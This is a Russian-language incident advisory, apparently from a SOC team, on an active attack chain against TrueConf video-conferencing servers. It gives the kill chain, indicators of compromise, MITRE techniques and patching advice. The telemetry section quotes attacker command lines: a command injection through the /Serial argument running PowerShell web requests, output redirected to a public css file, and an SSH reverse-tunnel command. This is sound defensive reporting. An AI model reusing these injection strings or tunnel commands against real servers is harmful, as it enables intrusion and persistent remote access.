Прямо сейчас в отечественном сегменте быстро набирает обороты атака с эксплуатацией цепочки уязвимостей в ПО для видео-конференц-связи TrueConf. Если в вашей компании используется эта программа, срочно идите под кат. Там мы, команды специалистов по форензике центра мониторинга и реагирования на кибератаки RED Security SOC и компании CICADA8, собрали для вас краткое описание Kill Chain, дали индикаторы компрометации и рекомендации по защите.

Оглавление

Kill Chain

Попытки эксплуатации цепочки уязвимостей в большинстве случаев инициируются с выходных узлов сервиса анонимизации Proton VPN. 

На первом этапе злоумышленники эксплуатируют известные уязвимости TrueConf: BDU:2025-10114 (Server-Side Request Forgery) и BDU:2025-10116 (Command Injection), опубликованные в БДУ ФСТЭК совсем недавно, в августе этого года. Разработчик решения уже выпустил обновления безопасности, однако, судя по растущему числу атак с этим вектором, во многих организациях до сих пор стоят непропатченные версии. 

После успешной эксплуатации этих уязвимостей злоумышленник запускает произвольную команду оболочки cmd.exe (например, скачивание и запуск исполняемых файлов) от имени процесса tc_webmgr.exe (C:\Program Files\TrueConf Server\httpconf\bin\tc_webmgr.exe).

Получив доступ к удаленному выполнению команд на сервере TrueConf, атакующие проводят разведку. Вывод команд перенаправляется в файл по относительному пути ../private/css/c.css (полный путь будет C:\Program Files\TrueConf Server\httpconf\site\private\css\c.css). Таким образом, результат выполняемых команд можно получить в качестве файла через публично доступную директорию веб-сервера.

Следующим шагом злоумышленники создают локального пользователя с привилегированными правами доступа для дальнейшего закрепления в системе (audit, audit1). За этим следует подключение по SSH со скомпрометированного сервера к С&С-серверу злоумышленников для закрепления доступа. Закрепление в инфраструктуре происходит путем установки сервиса, указывающего на вредоносную библиотеку.

После этого злоумышленники начинают разведку инфраструктуры, чтобы выбрать дальнейший вектор атаки.

Атрибуция

По данным коллег из отрасли, некоторые индикаторы относятся к группировке Head Mare. В частности, к адресу 5.178.96[.]82 на VirusTotal дан комментарий: «C2 server Head Mare #APT. Задание_на_оценку_N_2046_от_05_августа_2025_года.zip winnt64_.dll», а сама цепочка атаки совпадает с описанием коллег из BI.ZONE.

Рекомендации и индикаторы компрометации

Итак, первичный доступ получен путем эксплуатации известных уязвимостей TrueConf, для которых уже есть обновление безопасности. Поэтому первое и главное: обновите ПО до самой новой версии.

Также в ходе атаки зафиксировано внедрение вредоносных библиотек и иные методы закрепления в инфраструктуре организации. Для детектирования данной активности атакующих рекомендуем:

  • отслеживать доступы и активность процессов tc_webmgr.exe и tc_server.exe;

  • заблокировать индикаторы компрометации на периметровом сетевом оборудовании;

  • провести поиск перечисленных ниже индикаторов активности злоумышленника.

Мы рекомендуем делать первичную оценку не по индикаторам постэксплуатационной активности злоумышленника (они могут измениться в любое время), а по признакам эксплуатации цепочки уязвимостей. Соответствующие индикаторы даны ниже.

Сетевые индикаторы (постэксплуатационная активность):

IoCs

Контекст

5.252.178[.]171

Сервер злоумышленников

31.57.108[.]232

Сервер злоумышленников, исходящее SSH-подключение

31.58.134[.]251

Сервер злоумышленников

xbox-updater[.]online

31.57.109[.]151

Сервер злоумышленников

5.178.96[.]82

Сервер злоумышленников

185.90.60[.]227

Сервер злоумышленников

Файловые индикаторы (постэксплуатационная активность):

IoCs

Контекст

/Program Files/TrueConf Server/httpconf/site/private/css/c.css

Файл сервера trueconf, куда выводятся результаты команд злоумышленников

 /Program Files/TrueConf Server/httpconf/site/public/r.dll

 /Program Files/TrueConf Server/httpconf/site/public/a.dll

 

Внедрение вредоносных библиотек (их вызов происходит через rundll32, который запускается через ту же цепочку уязвимостей отдельной командой — после командлета Invoke-WebRequest)

%UserProfile%\Desktop\ssh.msi

%UserProfile%\Desktop\ssh.msi

Установщик SSH для закрепления

%UserProfile%\Desktop\logparse.exe 

%UserProfile%\Desktop\ddm\memprocfs.exe

%UserProfile%\Desktop\ddm\DumpIt.exe

Разведка на сервере

%UserProfile%\Desktop\adrecon.ps1

Разведка в домене

%UserProfile%\Desktop\psexec.exe

Перемещение по хостам

C:\Windows\System32\run.ps1

Скрипт с серверов для создания службы SscpSvc, прописывает библиотеку dfxhost.dll как ее исполняемый файл

C:\Windows\System32\dfxhost.dll

Вредоносная служба SscpSvc (бэкдор)

Индикаторы для поиска в данных телеметрии (события старта процессов и т. п.)

  • Запуск SSH-туннеля (постэксплуатационная активность):

ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 39433 -p 443 ...@...

  • Инъекция команды (успешная эксплуатация BDU:2025-10116, признак эксплуатации):

cmd.exe /s /c ""C:\Program Files\TrueConf Server\tc_server.exe" /mode:1 /ServerID:a /ServerName:aaa1111#vcs /Serial::||powershell -c "…"|| /File:"D:\TrueConf\activation\offlinereg.vrg""

  • Детектирование подозрительного процесса (признак эксплуатации) сигнатурами типа LowFidelity со стороны Windows Defender (такое срабатывание попадает только в файловый лог – C:\ProgramData\Microsoft\Windows Defender\Support\MPLog-*.log и C:\ProgramData\Microsoft\Microsoft AntiMalware\Support\MPLog-*.log):

2025-XX-XXTYY:YY:YY.YYY Engine:command line reported as lowfi: C:\Windows\System32\cmd.exe(cmd.exe /s /c C:\Program Files\TrueConf Server\tc_server.exe /mode:1 /ServerID:a /ServerName:aaa1111#vcs /Serial:||powershell -c iwr …|sc ../private/css/c.css|| /File:D:\TrueConf\activation\offlinereg.vrg)

  • Детектирование подозрительной библиотеки (постэксплуатационная активность) и сбор телеметрии со стороны Windows Defender:

BEGIN BM telemetry GUID:{4AD0B666-1A8A-B24A-0D29-F948A849D844} SignatureID:94230468382436 SigSha:e785adfba47a55a5a94699b391ee10a9299d593f ThreatLevel:0 ProcessID:15244 ProcessCreationTime:X SessionID:0 CreationTime:X ImagePath:C:\Windows\System32\rundll32.exe Taint Info:Friendly: Y; Reason: ; Modules: C:\Program Files\TrueConf Server\httpconf\site\public\r.dll:25,; Parents: C:\Windows\System32\cmd.exe:15764:1,C:\Windows\System32\lsass.exe:900:2, Operations:None END BM telemetry 

  • Журнал ошибок веб-сервера TrueConf тоже может содержать признаки эксплуатации (пример пути: C:\TrueConf\web_logs\error.*.log):

error: the required argument for option '--Serial' is missing

Важно: указанная выше строка является однозначным признаком попытки эксплуатации уязвимости (инъекция команды через аргумент /Serial), однако возможно появление эксплойтов, где до инъекции указывается корректный ключ активации.

В этом же журнале могут быть и следы постэксплуатационной активности (вывод stderr-утилит, которые не должны штатно запускаться от веб-сервера).

  • Вывод curl:

curl : The response content cannot be parsed because the Internet Explorer engine is not available, or Internet Explorer's first-launch configuration is not complete. Specify the UseBasicParsing parameter and try again. 

At line:1 char:1

+ curl ident.me|sc ../private/css/c.css

+ ~~~~~~~~~

+ CategoryInfo : NotImplemented: (:) [Invoke-WebRequest], NotSupportedException

+ FullyQualifiedErrorId : WebCmdletIEDomNotSupportedException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand

  • Вывод ssh:

Warning: Permanently added '[xxx]:443' (ED25519) to the list of known hosts.

Используемые техники

1. Initial Access (TA0001)

— Exploit Public-Facing Application (T1190)

2. Execution (TA0002)

— Command and Scripting Interpreter: PowerShell (T1059.001)

— Command and Scripting Interpreter: Windows Command Shell (T1059.003)

— System Binary Proxy Execution: Rundll32 (T1218.011)

3. Persistence (TA0003)

— Create Account: Local Account (T1136.001)

— Valid Accounts: Domain Accounts (T1078.002)

— Valid Accounts: Local Accounts (T1078.003)

— Create or Modify System Process: Windows Service (T1543.003)

4. Credential Access (TA0006)

— OS Credential Dumping: LSASS Memory (T1003.001)

5. Discovery (TA0007)

— Account Discovery: Local Account (T1087.001)

— Network Service Discovery (T1046)

6. Lateral Movement (TA0008)

— Remote Services: Remote Desktop Protocol (T1021.001)

7. Command and Control (TA0011)

— Protocol Tunneling (T1572)

Возможно, позже напишем более подробный разбор TTP этой группировки, а пока дали главное. Это, как мы надеемся, поможет поставить развивающуюся атаку на мониторинг и, если что, быстро задетектить злоумышленников. 

Всем добра и безопасности!

Комментарии (0)